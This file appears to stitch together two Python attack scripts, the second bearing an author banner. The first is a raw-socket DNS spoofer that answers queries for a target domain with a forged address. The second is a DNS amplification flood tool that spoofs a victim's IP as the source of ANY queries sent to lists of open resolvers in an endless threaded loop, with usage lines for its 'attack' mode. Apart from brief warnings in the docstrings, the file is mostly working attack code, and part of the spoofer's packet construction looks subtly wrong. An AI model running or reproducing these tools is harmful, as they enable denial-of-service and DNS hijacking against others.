import socket
import struct
# DNS query name to watch for, and the IPv4 address written into the answer record
target_domain = 'www.example.com'
target_ip = '192.168.1.100'
def get_dns_header(data):
    """Extract the flags word and the question count from a DNS header.

    The first 12 bytes of ``data`` are decoded as six big-endian unsigned
    16-bit fields; the second field (flags) and the third field (question
    count) are handed back.

    Args:
        data: Bytes of a DNS message, header first.

    Returns:
        A ``(flags, qdcount)`` tuple of ints.

    Raises:
        struct.error: If ``data`` holds fewer than 12 bytes.
    """
    _ident, flag_bits, question_count, *_other_counts = struct.unpack('!6H', data[:12])
    return flag_bits, question_count
def build_dns_response(data):
    """Assemble DNS response bytes for the DNS request held in ``data``.

    ``data`` is the DNS message itself (header first). The transaction ID and
    question count are copied from it, everything after the 12-byte header is
    echoed back unchanged, and the record bytes built below are appended.
    Reads the module-level ``target_domain`` and ``target_ip``.

    Args:
        data: Bytes of the incoming DNS message.

    Returns:
        The assembled response as ``bytes``.
    """
    # Build the header fields of the DNS response
    transaction_id = data[:2]  # echoed so the response carries the request's ID
    flags = b'\x81\x80'  # 0x8180: QR (response), RD and RA bits set, RCODE 0 (RFC 1035 header layout)
    qdcount = data[4:6]  # question count copied from the request
    ancount = b'\x00\x01'  # one answer record
    nscount = b'\x00\x00'
    arcount = b'\x00\x00'
    query = data[12:]  # everything following the 12-byte header
    # Build the resource-record bytes carried in the DNS response
    response = target_domain.encode('ascii') + b'\x00'  # dotted name as raw ASCII plus a zero byte
    response += b'\x00\x01\x00\x01'  # two 16-bit fields, each 1 (type A / class IN in RFC 1035 numbering)
    response += b'\xc0\x0c'  # compression pointer to message offset 12 (first name after the header)
    response += b'\x00\x01\x00\x01'  # type 1, class 1
    response += b'\x00\x00\x00\x32'  # 32-bit TTL field: 0x32 = 50
    response += b'\x00\x04'  # RDLENGTH: 4 bytes of address data follow
    response += socket.inet_aton(target_ip)  # packed 4-byte IPv4 address
    # Concatenate the pieces into the final DNS response
    dns_response = transaction_id + flags + qdcount + ancount + nscount + arcount + query + response
    return dns_response
def main():
    """Capture IP traffic on a raw socket and answer DNS queries for ``target_domain``.

    Runs forever. Each received packet is assumed to start with a 20-byte IP
    header (no options) followed by an 8-byte UDP header; anything that is not
    UDP to destination port 53 is skipped.

    NOTE: ``socket.ioctl`` / ``SIO_RCVALL`` are only available on Windows, and
    raw sockets typically require elevated privileges. Only run this on a
    network you are authorised to test.
    """
    # Create a raw socket that receives all network traffic
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_IP)
    sock.bind(('0.0.0.0', 0))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    sock.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)  # switch the socket to receive-all mode
    while True:
        # Receive network traffic
        data, addr = sock.recvfrom(65535)
        # Parse the IP header and check whether the protocol is UDP
        ip_header = data[:20]
        iph = struct.unpack('!BBHHHBBH4s4s', ip_header)
        protocol = iph[6]  # seventh unpacked field is the IP protocol number
        if protocol!= 17:  # 17 = UDP
            continue
        # Parse the UDP header and check whether this is a DNS request
        udp_header = data[20:28]
        udph = struct.unpack('!HHHH', udp_header)
        src_port = udph[0]
        dst_port = udph[1]
        if dst_port!= 53:
            continue
        # Parse the DNS header and check whether the queried name is the target domain
        dns_header = get_dns_header(data[28:])
        # Continue only when the top flag bit (QR) is clear, i.e. a query, with exactly one question
        if dns_header[0] & 0x8000 == 0 and dns_header[1] == 1:
            query = data[28+12:]  # bytes after the IP, UDP and DNS headers
            domain = query.split(b'\x00')[0].decode('ascii')  # bytes up to the first zero byte, as text
            if domain == target_domain:
                dns_response = build_dns_response(data[28:])
                sock.sendto(dns_response, addr)  # addr is the address reported by recvfrom
# Script entry point: start the capture loop only when run directly, not on import.
if __name__ == '__main__':
    main()
import os,sys,threading,time
from scapy.all import *
import argparse
def Inspect_DNS_Usability(filename):
    """Return the addresses from ``filename`` that replied to a DNS probe.

    The file is read one address per line. Each address is sent a single
    recursive DNS query for ``www.baidu.com`` over UDP, and the probe waits up
    to 2 seconds for a reply.

    Args:
        filename: Path of a text file holding one DNS server IP per line.

    Returns:
        A list of source-address strings taken from the replies, in file
        order. Addresses that did not reply, or whose probe raised, are
        omitted.
    """
    proxy_list = []
    # Context manager so the file handle is closed even if a probe raises.
    with open(filename, "r") as fp:
        for line in fp:
            addr = line.strip()
            if not addr:
                # Blank lines carry no address to probe.
                continue
            try:
                respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1, qd=DNSQR(qname="www.baidu.com")), timeout=2)
                # sr1 returns None when nothing answered within the timeout.
                if respon is not None:
                    proxy_list.append(str(respon["IP"].src))
            except Exception:
                # Deliberately best-effort: one bad address must not abort the scan.
                continue
    return proxy_list
def DNS_Flood(target,dns):
    """Build one IP/UDP/DNS packet and send it with scapy's ``sr1``.

    The IP source address is set to ``target`` and the destination to ``dns``;
    both UDP ports are 53.

    WARNING: the packet carries a source address chosen by the caller rather
    than this host's own. Sending such traffic at systems you do not own or
    are not explicitly authorised to test is abusive and generally illegal.

    Args:
        target: Address placed in the IP source field.
        dns: Address placed in the IP destination field.
    """
    # Build the IP layer
    ip_pack = IP()
    ip_pack.src = target
    ip_pack.dst = dns
    # Example values:
    # ip_pack.src = "192.168.1.2"
    # ip_pack.dst = "8.8.8.8"
    # Build the UDP layer
    udp_pack = UDP()
    udp_pack.sport = 53
    udp_pack.dport = 53
    # Build the DNS layer
    dns_pack = DNS()
    dns_pack.rd = 1
    dns_pack.qdcount = 1
    # Build the DNSQR question record
    dnsqr_pack = DNSQR()
    dnsqr_pack.qname = "baidu.com"
    dnsqr_pack.qtype = 255
    dnsqr_pack.qd = dnsqr_pack
    respon = (ip_pack/udp_pack/dns_pack)
    sr1(respon)
def Banner():
    """Print the ASCII-art banner and the contact line to standard output."""
    # Every literal backslash in the art is written as "\\" so that no
    # invalid escape sequence (such as a backslash directly before "_")
    # appears in the string literals; the printed text is unaffected.
    banner_lines = (
        " _ ____ _ _ ",
        " | | _ _/ ___|| |__ __ _ _ __| | __",
        " | | | | | \\___ \\| '_ \\ / _` | '__| |/ /",
        " | |__| |_| |___) | | | | (_| | | | < ",
        " |_____\\__, |____/|_| |_|\\__,_|_| |_|\\_\\",
        " |___/ \n",
        "E-Mail: me@lyshark.com\n",
    )
    for line in banner_lines:
        print(line)
# Command-line entry point: print the banner, parse arguments and dispatch on --mode.
# WARNING: the "flood" branch emits traffic in an endless loop; only use it
# against systems you own or are explicitly authorised to test.
if __name__ == "__main__":
    Banner()
    parser = argparse.ArgumentParser()
    parser.add_argument("--mode",dest="mode",help="选择执行命令<check=检查 DNS 可用性/flood=攻击>")
    parser.add_argument("-f","--file",dest="file",help="指定一个 DNS 字典,里面存储 DNSIP 地址")
    parser.add_argument("-t",dest="target",help="输入需要攻击的 IP 地址")
    args = parser.parse_args()
    if args.mode == "check" and args.file:
        # check mode: probe every address in the file and save the responders to pass.log
        proxy = Inspect_DNS_Usability(args.file)
        fp = open("pass.log","w+")
        for item in proxy:
            fp.write(item + "\n")
        fp.close()
        print("[+] DNS 地址检查完毕,当前可用 DNS 保存为 pass.log")
    elif args.mode == "flood" and args.target and args.file:
        # flood mode: load the address list once, then loop forever
        with open(args.file,"r") as fp:
            countent = [line.rstrip("\n") for line in fp]
        while True:
            # Pick one address at random per iteration and hand it to a new thread
            randomDNS = str(random.sample(countent,1)[0])
            print("[+] 目标主机: {} -----> 随机 DNS: {}".format(args.target,randomDNS))
            t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,))
            t.start()
    else:
        # Unknown mode or missing arguments: show usage
        parser.print_help()
main.py --mode=check -f dns.txt
main.py --mode=flood -f pass.log -t 192.168.1.1
-->